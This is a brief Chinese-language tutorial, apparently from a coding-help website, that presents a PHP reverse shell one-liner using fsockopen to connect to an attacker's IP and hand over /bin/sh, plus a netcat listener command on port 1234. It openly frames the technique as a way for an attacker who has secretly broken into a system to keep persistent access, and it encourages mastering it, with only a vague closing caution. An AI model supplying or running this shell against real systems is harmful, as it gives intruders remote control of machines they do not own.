📅  最后修改于: 2023-12-03 15:18:20.953000             🧑  作者: Mango
在网络安全中,反向 shell 是一种非常有用的技术,可以使攻击者在偷偷地入侵系统后维持持久性,并使其能够在任何时间返回该系统,而不必重新得到访问权限。 在 PHP 中,这个反向 shell 可以非常容易地实现,只需一行代码即可。
以下是一个简单易用的 PHP 反向 shell oneliner:
php -r '$sock=fsockopen("<your-IP>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'
该 one-liner 中的代码段使用 PHP 的 -r 选项,以运行提供的 PHP 代码。代码打开一个与攻击者的主机的连接,然后在另一个文件描述符上(3,在连接上),将 bash shell 的 stdin、stdout 和 stderr 重定向到攻击者的主机上。
在使用此 oneliner 之前,需要在攻击者机器上启动一个监听器,并将端口指定为代码中使用的端口。
示例使用 netcat 监听器,指定端口 1234:
nc -vvlnp 1234
如果能熟练使用这个简单的 oneliner,那么在必要时,您将能够更快更容易地使用 PHP 对系统进行反向 shell。但是请务必小心,以免出现不必要的安全问题。